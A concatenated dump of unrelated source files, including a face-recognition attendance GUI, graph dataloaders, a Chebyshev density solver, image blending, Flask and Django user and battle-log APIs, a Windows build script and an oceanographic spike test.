cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\n\r\n rec = cv2.face.LBPHFaceRecognizer_create()\r\n rec.read(\"trainer/trainer.yml\")\r\n my_list=[]\r\n\r\n\r\n img = cv2.imread(filename)\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n # noise removal using iterative bilateral filters(removing noise and preserving edges\r\n\r\n gray = cv2.bilateralFilter(gray, 11, 17, 17)\r\n faces = face_cascade.detectMultiScale(gray, 1.5, 5)\r\n for (x, y, w, h) in faces:\r\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 255), 2)\r\n id, conf = rec.predict(gray[y:y + h, x:x + w])\r\n\r\n if conf > 75:\r\n my_list.append(id)\r\n\r\n cv2.imshow(\"detected faces\", img)\r\n cv2.waitKey(0)\r\n\r\n\r\n df1 = pd.read_excel('attendance.xlsx')\r\n\r\n row, column = df1.shape\r\n df1.loc[:, df1.columns[column - 1]] = 0\r\n for i in my_list:\r\n df1.loc[df1['ID'] == i, df1.columns[column - 1]] = 1\r\n print(df1)\r\n df1.to_csv(r'C:/xampp1/htdocs/facedetect/markedattendance.csv')\r\n\r\n\r\n#training with dataset and training the model and saving trained data in a yml file\r\ndef train():\r\n recognizer = cv2.face.LBPHFaceRecognizer_create()\r\n detector = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\");\r\n path = 'C:/xampp1/htdocs/facedetect/dataset'\r\n\r\n def getImagesAndLabels(path):\r\n # get the path of all the files in the folder\r\n imagePaths = [os.path.join(path, f) for f in os.listdir(path)]\r\n # create empth face list\r\n faceSamples = []\r\n # create empty ID list\r\n Ids = []\r\n # now looping through all the image paths and loading the Ids and the images\r\n for imagePath in imagePaths:\r\n # loading the image and converting it to gray scale\r\n pilImage = Image.open(imagePath).convert('L')\r\n # Now we are converting the PIL image into numpy array\r\n imageNp = np.array(pilImage, 'uint8')\r\n # getting the Id from the image\r\n Id = int(os.path.split(imagePath)[-1].split(\".\")[1])\r\n # extract the face from the training image sample\r\n faces = detector.detectMultiScale(imageNp)\r\n # If a face is there then append that in the list as well as Id of it\r\n for (x, y, w, h) in faces:\r\n faceSamples.append(imageNp[y:y + h, x:x + w])\r\n Ids.append(Id)\r\n return faceSamples, Ids\r\n\r\n faces, Ids = getImagesAndLabels('dataSet')\r\n recognizer.train(faces, np.array(Ids))\r\n print(\"Successfully trained\")\r\n recognizer.write('trainer/trainer.yml')\r\n#create the attendance sheet\r\ndef create():\r\n QUERY = 'SELECT * FROM studentdetails;'\r\n cur.execute(QUERY)\r\n result = cur.fetchall()\r\n with open('dbdump01.csv', 'w', newline='') as outcsv:\r\n writer = csv.DictWriter(outcsv, fieldnames=[\"ID\", \"Name\", \"sem\",\"section\"])\r\n writer.writeheader()\r\n c = csv.writer(outcsv,quoting=csv.QUOTE_ALL)\r\n for x in result:\r\n c.writerow(x)\r\n\r\n read_file = pd.read_csv('dbdump01.csv')\r\n read_file.to_excel(r'C:\\xampp1\\htdocs\\facedetect\\attendance.xlsx', index=None, header=True)\r\n\r\n\r\n#predict student attendance\r\ndef pred():\r\n os.system('python predict.py')\r\n\r\nroot = Tk()\r\nment=StringVar()\r\n\r\n\r\nlabel_frame = LabelFrame(root, text='select an action')\r\nlabel_frame.pack(expand='yes', fill='both')\r\n#training model after registering\r\nbutton1= Button(root, text=\"train system with all registered faces\",command=train)\r\nbutton1.place(x=120, y=40)\r\n#running attendance system\r\nbutton = Button(label_frame, text=\"select an image an run face based attendance\", command=open_file)\r\nbutton.place(x=120, y=250)\r\n#create attendance sheet with registered users\r\nbutton2 = Button(label_frame, text=\"create attendance sheet\",command=create)\r\nbutton2.place(x=120, y=80)\r\n#entering attendance date\r\nbtn2 = Button(root, text='please enter date',command=mark)\r\nbtn2.place(x=150, y=170)\r\nmentry=Entry(label_frame,textvariable=ment)\r\nmentry.place(x=150,y=130)\r\nbutton3= Button(label_frame, text=\"predict student attendance\",command=pred)\r\nbutton3.place(x=150, y=300)\r\n\r\n\r\n\r\nroot.geometry(\"400x400\")\r\nroot.mainloop()\r\n\r\n\r\n\r\n","sub_path":"facedetect/detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"53019425","text":"import torch.utils.data\nfrom dgl.data import tu\nimport dgl\n\nfrom core.dataloader.constants import TRAIN_RATIO, TEST_RATIO\n\n\ndef make_data_loader(batch_size, dataset_name='Letter_low', cuda=False):\n \"\"\"\n Create train/val/test dataloaders\n :param batch_size: batch size (applies for train/test/val)\n :param dataset_name: dataset name, to take from TU dortmund dataset\n (https://ls11-www.cs.tu-dortmund.de/staff/morris/graphkerneldatasets)\n :param cuda: if cuda is available\n :return: train_dataloader, val_dataloader, test_dataloader\n \"\"\"\n\n # 1. create train/val/test datasets\n dataset = tu.LegacyTUDataset(name=dataset_name)\n preprocess(dataset, cuda)\n\n train_size = int(TRAIN_RATIO * len(dataset))\n test_size = int(TEST_RATIO * len(dataset))\n val_size = int(len(dataset) - train_size - test_size)\n dataset_train, dataset_val, dataset_test = torch.utils.data.random_split(\n dataset, (train_size, val_size, test_size))\n\n # 2. create train/val/test dataloader\n train_dataloader = torch.utils.data.DataLoader(dataset_train,\n batch_size=batch_size,\n shuffle=True,\n collate_fn=collate\n )\n\n val_dataloader = torch.utils.data.DataLoader(dataset_val,\n batch_size=batch_size,\n shuffle=False,\n collate_fn=collate\n )\n\n test_dataloader = torch.utils.data.DataLoader(dataset_test,\n batch_size=batch_size,\n shuffle=False,\n collate_fn=collate\n )\n\n return train_dataloader, val_dataloader, test_dataloader\n\n\ndef collate(data):\n \"\"\"\n Collate function\n \"\"\"\n graphs, labels = map(list, zip(*data))\n batched = dgl.batch(graphs)\n labels = torch.LongTensor(labels)\n return batched, labels\n\n\ndef preprocess(dataset, cuda):\n \"\"\"\n Preprocess graphs by casting into FloatTensor and setting to cuda if available\n :param dataset: (LegacyTUDataset)\n :param cuda: (bool) if cuda is available\n :return:\n \"\"\"\n for g, _ in dataset:\n for key_g, val_g in g.ndata.items():\n processed = g.ndata.pop(key_g)\n processed = processed.type('torch.FloatTensor')\n if cuda:\n processed = processed.cuda()\n g.ndata[key_g] = processed\n for key_g, val_g in g.edata.items():\n processed = g.edata.pop(key_g)\n processed = processed.type('torch.FloatTensor')\n if cuda:\n processed = processed.cuda()\n g.edata[key_g] = processed\n","sub_path":"core/dataloader/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"509107877","text":"# https://codility.com/programmers/lessons/7-stacks_and_queues/fish/\n# TC: O(N)\n# SC: O(1)\n# python 2.7.13\n\ndef solution(A, B):\n N = len(A)\n stack = []\n for i in range(0, N):\n if len(stack) == 0 or B[i] == 1:\n stack.append(i)\n elif B[i] == 0:\n be_eaten = False\n while len(stack) != 0 and B[stack[-1]] == 1:\n index = stack[-1]\n if A[index] < A[i]:\n stack.pop()\n continue\n else:\n be_eaten = True\n break;\n if not be_eaten:\n stack.append(i)\n return len(stack)\n\nif __name__ == '__main__':\n assert solution([4,3,2,1,5], [0,1,0,0,0]) == 2\n","sub_path":"lessons/7.stacks-and-queues/Fish.py","file_name":"Fish.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"442778314","text":"from typing import Iterable, Callable, Sequence\nimport math\nimport numpy as np\nimport scipy\nimport scipy.integrate\nimport scipy.fftpack\nimport scipy.optimize\n\nfrom numpy.polynomial.chebyshev import Chebyshev\ncb = Chebyshev.basis\n\n\ndef fit_cheby(fvals: np.ndarray) -> np.ndarray:\n n = len(fvals)\n cs = scipy.fftpack.dct(fvals, type=1)\n cs /= n\n cs[0] /= 2\n return cs\n\n\nclass CSolver:\n def __init__(\n self,\n k: int,\n n: int = 128,\n n_steps: int = 15,\n grad_tol: float = 1e-8,\n verbose : bool=False\n ):\n self.k = k\n self.n = n\n self.xrs = np.cos(np.arange(n+1) * math.pi / n)\n xrs_moments = [\n cb(i)(self.xrs)\n for i in range(k)\n ]\n self.G = np.vstack(xrs_moments)\n self.verbose = verbose\n self.n_steps = n_steps\n self.grad_tol = grad_tol\n self.lambd = None\n self.f_poly = None\n\n def solve(\n self,\n d_mus:np.ndarray,\n lambd=None,\n ):\n n = self.n\n k = self.k\n\n if lambd is None:\n lambd = np.zeros(self.k)\n\n H = np.zeros(shape=(k, k))\n fpoly = None\n\n for i_step in range(self.n_steps):\n if fpoly is None:\n fvals = np.exp(lambd.dot(self.G))\n cs = fit_cheby(fvals)\n fpoly = Chebyshev(cs)\n\n e_mu = np.array([\n (fpoly*cb(i)).integ(lbnd=-1)(1)\n for i in range(2*k)\n ])\n grad = e_mu[:k] - d_mus\n grad_norm = np.linalg.norm(grad)\n\n grad_norm_old = grad_norm\n Pval_old = e_mu[0] - lambd.dot(d_mus)\n\n\n if self.verbose:\n print(\"Step: {}, Grad: {}, P: {}\".format(\n i_step, grad_norm, Pval_old\n ))\n if grad_norm < self.grad_tol:\n break\n\n for i in range(k):\n for j in range(k):\n H[i, j] = (e_mu[i+j] + e_mu[abs(i-j)]) / 2\n step = -np.linalg.solve(H, grad)\n dfdx = step.dot(grad)\n\n stepScaleFactor = 1.0\n newX = lambd + stepScaleFactor * step\n alpha = .3\n beta = .25\n\n while True:\n fvals = np.exp(newX.dot(self.G))\n cs = fit_cheby(fvals)\n fpoly = np.polynomial.chebyshev.Chebyshev(cs)\n\n e_mu = np.array([\n (fpoly * cb(i)).integ(lbnd=-1)(1)\n for i in range(2 * k)\n ])\n grad = e_mu[:k] - d_mus\n grad_norm = np.linalg.norm(grad)\n\n Pval_new = fpoly.integ(lbnd=-1)(1) - newX.dot(d_mus)\n delta_change = Pval_old + alpha * stepScaleFactor * dfdx - Pval_new\n\n # if (delta_change > -1e-6 and grad_norm < grad_norm_old) or stepScaleFactor < 1e-5:\n if (delta_change > -1e-6 or stepScaleFactor < 1e-5):\n break\n else:\n stepScaleFactor *= beta\n if self.verbose:\n print(\"step: {}, delta: {}\".format(stepScaleFactor, delta_change))\n newX = lambd + stepScaleFactor * step\n\n lambd = newX\n\n self.lambd = lambd\n self.f_poly = self.get_fpoly(lambd)\n self.cdf_poly = self.f_poly.integ(lbnd=-1)\n\n def get_fpoly(self, lambd: np.ndarray):\n n = 256\n cs = None\n while n < 10000:\n xrs = np.cos(np.arange(n + 1) * math.pi / n)\n epoly = np.polynomial.chebyshev.Chebyshev(lambd)\n f = np.exp(epoly(xrs))\n cs = scipy.fftpack.dct(f, type=1)\n eps = np.max(np.abs(cs[-3:]))\n if eps < 1e-6:\n cs *= 1 / (n - 1)\n cs[0] /= 2\n break\n else:\n n *= 2\n if self.verbose:\n print(\"Final Poly has degree: {}\".format(n))\n fpoly = np.polynomial.chebyshev.Chebyshev(cs)\n return fpoly\n\n def get_pdf(self) -> Chebyshev:\n return self.f_poly\n\n def get_cdf(self) -> Chebyshev:\n return self.cdf_poly\n\n def get_quantile(self, p: float) -> float:\n pmin = self.cdf_poly(-1)\n pmax = self.cdf_poly(1)\n # Compensate for slightly un-normalized cdfs\n padj = p*(pmax - pmin) + pmin\n if padj <= pmin:\n return -1\n if padj >= pmax:\n return 1\n res = scipy.optimize.brentq(\n lambda x: self.cdf_poly(x) - padj,\n -1,\n 1\n )\n return res\n","sub_path":"pysolver/csolver.py","file_name":"csolver.py","file_ext":"py","file_size_in_byte":4651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"293500070","text":"# -*- coding: utf-8 -*-\n'''\n======================Welcome to Python====================\n/-********Have a good time.********-/\n\nFILE NAME:\nAUTHOR: Eden·Gabriel \nDATE: Dec-54-Thu/2018 12:14:58 \nVERSION: V-1.0\nDESCRIPTION:\n图像融合\n'''\n\nimport cv2\nimport numpy as np\n\napple = cv2.imread('E:\\\\A_BOOM_LEARNING_EDEN_GABRIEL\\\\2018.12.19start_opencv+python\\\\Images\\\\apple.jpg')\norange = cv2.imread('E:\\\\A_BOOM_LEARNING_EDEN_GABRIEL\\\\2018.12.19start_opencv+python\\\\Images\\\\orange.jpg')\n\nrow,col,sh = apple.shape\nrow1,col1,sh1 = orange.shape\n\nG = apple.copy()\ngpA = [G]\n#对apple进行高斯金字塔处理\nfor i in range(6):\n G = cv2.pyrDown(G)\n gpA.append(G)\n#对orange进行高斯金字塔处理\nG = orange.copy()\ngpB = [G]\nfor i in range(6):\n G = cv2.pyrDown(G)\n gpB.append(G)\n#对apple作拉普拉斯金字塔处理\nlpA = [gpA[5]]\nfor i in range(5,0,-1):\n GE = cv2.pyrUp(gpA[i])\n L = cv2.subtract(gpA[i-1],GE)\n lpA.append(L)\n#对orange作拉普拉斯金字塔处理\nlpB = [gpB[5]]\nfor i in range(5,0,-1):\n GE = cv2.pyrUp(gpB[i])\n L = cv2.subtract(gpB[i-1],GE)\n lpB.append(L)\n \nLS = []\nfor la,lb in zip(lpA,lpB):\n rows,cols,channels = la.shape\n ls = np.hstack((la[:,0:cols//2],lb[:,cols//2:]))\n LS.append(ls)\n\nls_ = LS[0]#LS[0]是高斯金字塔中最小的图片\nfor i in range(1,6):\n ls_ = cv2.pyrUp(ls_)\n ls_ = cv2.add(ls_,LS[i])#采用金字塔拼接的方式\n\n\nreal = np.hstack((apple[:,:cols//2],orange[:,cols//2:]))#直接拼接的方式\n\nls_new = cv2.resize(ls_,(400,400))\n#ls_gray = cv2.cvtColor(ls_,cv2.COLOR_BGR2GRAY)\ncv2.imshow('ls_new',ls_new)\ncv2.imshow('real',real)\ncv2.imshow('ls_',ls_)\n\nk = cv2.waitKey(0)&0xFF\nif k == 27:\n cv2.destroyAllWindows()\n \n","sub_path":"图像融合.py","file_name":"图像融合.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"404671826","text":"from app.core import core\n\nfrom flask import (\n request,\n jsonify,\n current_app,\n)\n\nfrom app.core.models import User\nfrom app.core.schema import UserSchema\n\n\nclass JSONResponse:\n status = 'success'\n status_code = 200\n\n def __init__(self, message, status_code=None, status=None):\n self.message = message\n\n if status is not None:\n self.status = status\n\n if status_code is not None:\n self.status_code = status_code\n\n @property\n def jsonify(self):\n with current_app.app_context():\n return jsonify({\n 'message': self.message,\n 'status': self.status\n }), self.status_code\n\n\n@core.route('/users', methods=['POST'])\ndef add_a_user():\n raw = request.get_json()\n\n schema = UserSchema(strict=True)\n result = schema.load(raw)\n\n if result.errors == {}:\n user = User(**result.data)\n user.save()\n\n rv = JSONResponse(f'{user.email} was added!', 201)\n return rv.jsonify\n","sub_path":"app/core/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"285999239","text":"# Standard imports\nimport datetime\nfrom dateutil import parser\nimport json\nimport pytz\n\n# Django imports\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect, render_to_response\nfrom django.template import RequestContext\nfrom django.views.decorators.csrf import csrf_exempt\n\n# Third party imports\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\n# Local imports\nfrom data_app.models import UserProfile, BattleLog\nfrom data_app.utils import modify_value_type, username_hash\n\n\n@api_view(['POST'])\ndef user_create(request):\n \"\"\"API: Create user\"\"\"\n\n # Create new user\n if request.method == 'POST':\n first = request.DATA['first']\n last = request.DATA['last']\n nickname = request.DATA['nickname']\n\n users = User.objects.filter(first_name=first).filter(\n last_name=last).filter(userprofile__nickname=nickname)\n\n if len(users) == 0:\n user = User.objects.create_user(\n username=username_hash(first, last, nickname),\n first_name=first,\n last_name=last,\n password='kixeye123')\n\n user.save()\n profile = UserProfile(user=user, nickname=nickname,\n created=datetime.datetime.now(pytz.utc),\n last_seen=datetime.datetime.now(pytz.utc))\n profile.save()\n\n # Return success\n data = json.dumps({'error':False,\n 'time':datetime.datetime.now().isoformat(),\n 'userid':user.pk})\n return Response(data=data, status=status.HTTP_201_CREATED,\n content_type='application/json')\n\n # User with first, last , and nickname already exists\n else:\n\n # Return failure\n data = json.dumps(\n {'error':True,\n 'time':datetime.datetime.now(pytz.utc).isoformat(),\n 'msg':'A user with this first name, last name and nickname already exists.'})\n return Response(data=data, status=status.HTTP_409_CONFLICT,\n content_type='application/json')\n\n@api_view(['PUT'])\ndef user_modify(request, userid):\n \"\"\"API: Modify User\"\"\"\n\n users = User.objects.filter(pk=userid)\n\n # User not found\n if len(users) == 0:\n\n # Return failure\n data = json.dumps({'error':True,\n 'time':datetime.datetime.now(pytz.utc).isoformat(),\n 'msg':'A user with this user ID does not exist.'})\n return Response(data=data, status=status.HTTP_409_CONFLICT,\n content_type='application/json')\n\n # Modify existing user\n user = users[0]\n field = request.DATA['field']\n new_value_raw = request.DATA['value']\n attribute = field.lower().replace(\" \", \"_\")\n new_value = modify_value_type(attribute, new_value_raw)\n\n # Modify attribute in user object\n if field.lower() in ['first name', 'last name']:\n setattr(user, attribute, new_value)\n user.save()\n\n # Modify attribute in user profile object\n else:\n profile = UserProfile.objects.get(user=user)\n setattr(profile, attribute, new_value)\n profile.save()\n\n # Return success\n data = json.dumps({'error':False,\n 'time':datetime.datetime.now(pytz.utc).isoformat()})\n return Response(data=data, status=status.HTTP_200_OK,\n content_type='application/json')\n\n@api_view(['POST'])\ndef battle_log_create(request):\n \"\"\"API: Create battle log\"\"\"\n\n attacker_userid = request.DATA['attacker']\n defender_userid = request.DATA['defender']\n winner_userid = request.DATA['winner']\n battle_start_time = request.DATA['start']\n battle_end_time = request.DATA['end']\n\n attackers = User.objects.filter(pk=attacker_userid)\n if len(attackers) == 0:\n\n # Return failure if attacker does not exist\n data = json.dumps({'error':True,\n 'time':datetime.datetime.now(pytz.utc).isoformat(),\n 'msg':'An attacker with this user ID does not exist.'})\n return Response(data=data, status=status.HTTP_409_CONFLICT,\n content_type='application/json')\n\n defenders = User.objects.filter(pk=defender_userid)\n if len(defenders) == 0:\n\n # Return failure if defender does not exist\n data = json.dumps({'error':True,\n 'time':datetime.datetime.now(pytz.utc).isoformat(),\n 'msg':'A defender with this user ID does not exist.'})\n return Response(data=data, status=status.HTTP_409_CONFLICT,\n content_type='application/json')\n\n winners = User.objects.filter(pk=winner_userid)\n if len(winners) == 0:\n\n # Return failure if winner does not exist\n data = json.dumps({'error':True,\n 'time':datetime.datetime.now(pytz.utc).isoformat(),\n 'msg':'A winner with this user ID does not exist.'})\n return Response(data=data, status=status.HTTP_409_CONFLICT,\n content_type='application/json')\n\n attacker = attackers[0]\n defender = defenders[0]\n winner = winners[0]\n\n try:\n battle_start_time_formatted = parser.parse(battle_start_time)\n except:\n\n # Return failure if start time could not be formatted\n data = json.dumps({'error':True,\n 'time':datetime.datetime.now(pytz.utc).isoformat(),\n 'msg':'Unable to parse battle start time.'})\n return Response(data=data, status=status.HTTP_409_CONFLICT,\n content_type='application/json')\n\n try:\n battled_end_time_formatted = parser.parse(battle_end_time)\n except:\n\n # Return failure if end time could not be formatted\n data = json.dumps({'error':True,\n 'time':datetime.datetime.now(pytz.utc).isoformat(),\n 'msg':'Unable to parse battle end time.'})\n return Response(data=data, status=status.HTTP_409_CONFLICT,\n content_type='application/json')\n\n # Create Battle Log\n battle_log = BattleLog(attacker=attacker, defender=defender, winner=winner,\n start=battle_start_time_formatted,\n end=battled_end_time_formatted)\n battle_log.save()\n\n # Update wins, losses, current_win_streak - uncomment to activate\n \"\"\"\n profile_attacker = attacker.get_profile()\n profile_defender = defender.get_profile()\n\n if winner == attacker:\n profile_attacker.wins += 1\n profile_attacker.current_win_streak += 1\n profile_attacker.save()\n attacker.save()\n\n profile_defender.losses += 1\n if profile_defender.current_win_streak != 0:\n profile_defender.current_win_streak = 0\n profile_defender.save()\n defender.save()\n\n elif winner == defender:\n profile_defender.wins += 1\n profile_defender.current_win_streak += 1\n profile_defender.save()\n defender.save()\n\n profile_attacker.losses += 1\n if profile_attacker.current_win_streak != 0:\n profile_attacker.current_win_streak = 0\n profile_attacker.save()\n attacker.save()\n \"\"\"\n\n # Return success\n data = json.dumps({'error':False, 'time':datetime.datetime.now(pytz.utc).isoformat()})\n return Response(data=data, status=status.HTTP_200_OK,\n content_type='application/json')\n\n@csrf_exempt\ndef user_userid(request, userid):\n\n # API Modify User request\n if request.method == 'PUT':\n return user_modify(request, userid)\n\n # Get request for player data reporting\n elif request.method == 'GET':\n\n try:\n user = User.objects.get(pk=int(userid))\n profile = user.profile\n former_last_seen = profile.last_seen\n profile.last_seen = datetime.datetime.now(pytz.utc)\n profile.save()\n return render_to_response('user_profile.html',\n {'user': user,\n 'user_profile': user.profile,\n 'former_last_seen': former_last_seen},\n context_instance=RequestContext(request))\n\n # User not found\n except:\n return render_to_response('user_profile_does_not_exist.html',\n context_instance=RequestContext(request))\n\ndef user_search(request):\n \"\"\"Find user by nickname\"\"\"\n\n nickname = request.GET['nickname']\n users = User.objects.filter(userprofile__nickname__iexact=nickname)\n\n # Redirect to user profile if only one item is found\n if len(users) == 1:\n user = users[0]\n return redirect(\"/users/\" + str(user.id))\n\n # Display all users with links to profiles if more than one user is found\n user_tuples = []\n for user in users:\n user_tuples.append((user.first_name, user.last_name,\n user.profile.nickname, user.pk))\n\n return render_to_response('user_search.html',\n {'user_tuples': user_tuples},\n context_instance=RequestContext(request))\n\n@csrf_exempt\ndef battles(request):\n\n # API Create Battle Log request\n if request.method == 'POST':\n return battle_log_create(request)\n\n # GET request for battle start/end search\n elif request.method == 'GET':\n start_raw = request.GET['start']\n end_raw = request.GET['end']\n start_time = parser.parse(start_raw)\n end_time = parser.parse(end_raw)\n\n battle_logs = BattleLog.objects.filter(start__gt=start_time).filter(\n end__lt=end_time)\n\n return render_to_response('battle_log_search.html',\n {'battle_logs': battle_logs},\n context_instance=RequestContext(request))\n","sub_path":"apps/data_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"637701003","text":"from flask import Flask, render_template, request, redirect, url_for\r\nimport sqlite3\r\nfrom models import *\r\n\r\nimport os\r\nimport json\r\n\r\napp = Flask(__name__)\r\ninitialize_db()\r\n\r\n\r\n@app.route('/')\r\ndef home():\r\n\r\n return render_template(\"index.html\")\r\n\r\n\r\n@app.route('/results', methods=['POST'])\r\ndef results():\r\n\r\n search_term = request.form['tags'].lower().strip()\r\n\r\n drops = Drops.select().where(Drops.tags.contains(search_term))\r\n if not drops:\r\n return render_template('/results.html', no_drops = True,\r\n search_term=search_term)\r\n\r\n\r\n return render_template('/results.html', drops = drops,\r\n search_term=search_term)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"558955278","text":"from flask import Flask, request, render_template, make_response, Markup\r\nimport flask\r\n\r\napp = Flask(__name__)\r\n@app.route('/', methods=['GET'])\r\ndef render():\r\n arg = ''\r\n if request.method == 'GET':\r\n r = make_response(render_template('index-csp.html'))\r\n r.headers.set(\"X-XSS-Protection\", \"0\")\r\n r.headers['Content-Security-Policy'] = \"script-src 'self'\"\r\n return r\r\n\r\nif __name__=='__main__':\r\n app.run(debug=True)\r\n","sub_path":"level2/level-csp.py","file_name":"level-csp.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"311909571","text":"import sys\nimport shutil\nimport subprocess\nimport os\nimport urllib.request\nfrom zipfile import ZipFile\n\n# Requires installed: node, rustup, npm, 7z, nsis, vcpkg\n# VCPKG_ROOT has to be set\n# choco install nsis 7zip -y\ndef main():\n vcpkg = os.environ[\"VCPKG_ROOT\"]\n if not os.path.isdir(vcpkg):\n print(\"VCPKG_ROOT not set or invalid!\")\n return\n\n # Install libsndfile\n print(\"Installing libsndfile...\")\n subprocess.check_output([\"vcpkg\", \"install\", \"libsndfile:x64-windows-static\"], shell=True)\n\n # Compile UI\n print(\"Compiling UI...\")\n if not os.path.isfile(\"client\\\\dist\\\\dist.html\"):\n subprocess.check_output([\"npm\", \"i\"], shell=True, cwd='client')\n subprocess.check_output([\"npm\", \"run\", \"build\"], shell=True, cwd='client')\n\n # Generate output folders\n if os.path.isdir(\"dist\"):\n shutil.rmtree(\"dist\")\n os.mkdir(\"dist\")\n\n # Compile Rust\n print(\"Compiling...\")\n subprocess.check_output([\"rustup\", \"install\", \"nightly\"], shell=True)\n subprocess.check_output([\"rustup\", \"override\", \"set\", \"nightly\"], shell=True)\n env = os.environ.copy()\n # For libsndfile\n env[\"PATH\"] = os.path.join(vcpkg, \"installed\", \"x64-windows-static\", \"lib\") + ';' + env[\"PATH\"]\n env[\"RUSTFLAGS\"] = \"-Ctarget-feature=+crt-static\"\n subprocess.check_output([\"cargo\", \"build\", \"--release\"], shell=True, env=env)\n\n # Copy CEF\n print(\"Copying output files...\")\n for i in os.listdir(\"target\\\\release\\\\build\"):\n if i.startswith(\"cef-sys-\"):\n if 'out' in os.listdir(os.path.join(\"target\\\\release\\\\build\", i)):\n d = os.path.join(\"target\\\\release\\\\build\", i, \"out\")\n for file in os.listdir(d):\n if file.endswith('.tar.bz2'):\n os.remove(os.path.join(d, file))\n continue\n shutil.copytree(d, \"dist\\\\unpacked\")\n break\n # Copy bin\n shutil.copy(\"target\\\\release\\\\onetagger.exe\", \"dist\\\\unpacked\")\n shutil.copy(\"assets\\\\icon.ico\", \"dist\\\\unpacked\")\n\n # Generate output archive\n print(\"Generating archive...\")\n subprocess.check_output([\"7z\", \"a\", \"dist\\\\OneTagger-windows.7z\", \"-mmt8\", \"-mx9\", \"dist\\\\unpacked\"], shell=True)\n\n # Setup installer\n print(\"Generating installer...\")\n subprocess.check_output([\"C:\\\\Program Files (x86)\\\\NSIS\\\\makensis.exe\", \"assets\\\\installer.nsi\"], shell=True)\n \n\nif __name__ == '__main__':\n if sys.platform != \"win32\":\n print(\"Not Windows, exitting...\")\n exit(-1)\n\n main()","sub_path":"assets/compile-win.py","file_name":"compile-win.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"261353792","text":"# -*- coding: utf-8 -*-\n\"\"\"\n#==============================================================================\n# SPIKE TEST - QARTOD\n#==============================================================================\n\n\nGetting the thresholds to flag condition and verifying the number of NaN\nwithin the variable values group.\n\n\n\n#==============================================================================\n# @author: fncsobral\n# @date : 12/sep/2016\n# @mod.1 : 02/Nov/2016 - FS \n - reorganization to DataFrame scheme.\n# @mod.2 : 10/may/2017 - FS\n - [getting_thrshld]: vrb_values now has more values [6, before \n were 3] and lw and hg limits was amplified, based on the \n timeseries experience.\n#==============================================================================\n\"\"\"\n\nimport numpy as np\n\n#==============================================================================\n# \n#==============================================================================\ndef getting_thrshld(vrb_values):\n '''\n This function will give the high and low THRESHOLDS as a first guess to \n the values. They should be improved later.\n \n INPUT\n - \n RETURN\n - \n '''\n \n # lw = np.std([vrb_values[0], vrb_values[2]])\n \n # Removing Tn from the group data. Needs to convert to list \n vrb_values2 = np.delete(vrb_values.tolist(), 1)\n \n STD = np.std(vrb_values2) \n lw = STD * 2\n hg = STD * 3\n\n # Storing results\n THRSHLD = lw, hg\n \n return THRSHLD\n#==============================================================================\n# \n#==============================================================================\ndef ver_nghbr_nan(vrb_values):\n '''\n This script will verify if DATA_NEIGHBORS\n contains a NAN. If afirmative, flag 2 will\n be given, meaning that was not possible to\n evaluate.\n \n INPUT\n - DATA_LST: group of three data to verify in the future spike test.\n \n RETURN\n - FLAG : flag 2 if NaN is present.\n\n @date:26/sep/2016\n '''\n \n # If any of data is NaN\n fd_dt_nan = np.isnan(vrb_values)\n if np.any(fd_dt_nan): \n # If data analyzed is NaN, FLAG=9 \n if fd_dt_nan[0]: \n flag_nghbr = 9\n # If any of the neighbors is NaN, FLAG=2\n elif (fd_dt_nan[0] or fd_dt_nan[2]) and not fd_dt_nan[1]:\n flag_nghbr = 2 \n else:\n flag_nghbr = 0\n else:\n flag_nghbr = 0\n # print('Data is OK.', ' - [aux_spike.py]')\n \n return flag_nghbr\n\n#==============================================================================\n# END\n#==============================================================================","sub_path":"3.spike/aux_spike.py","file_name":"aux_spike.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"147079092","text":"# encoding: utf-8\r\n\r\nimport numpy as np\r\nimport fcts\r\nimport random\r\nimport copy\r\nimport matplotlib.pyplot as plt\r\nimport time\r\n\r\n\r\ndef f1(b):\r\n p = np.array(b) / 100000\r\n s = b[0] * p[0]\r\n for x in [1, 2, 3, 4]:\r\n s += np.sum(b[:(x + 1)]) * (1 - np.sum(p[:x])) * p[x]\r\n s += (np.sum(b[:5]) + 100000) * (1 - np.sum(p[:5]))\r\n return s\r\n\r\n\r\nclass DEIndividual:\r\n\r\n '''\r\n individual of differential evolution algorithm\r\n '''\r\n\r\n def __init__(self, fct, vardim, bound):\r\n '''\r\n vardim: dimension of variables\r\n bound: boundaries of variables\r\n '''\r\n self.vardim = vardim\r\n self.bound = bound\r\n self.fitness = 0.\r\n self.fct = fct\r\n\r\n def generate(self):\r\n '''\r\n generate a random chromsome for differential evolution 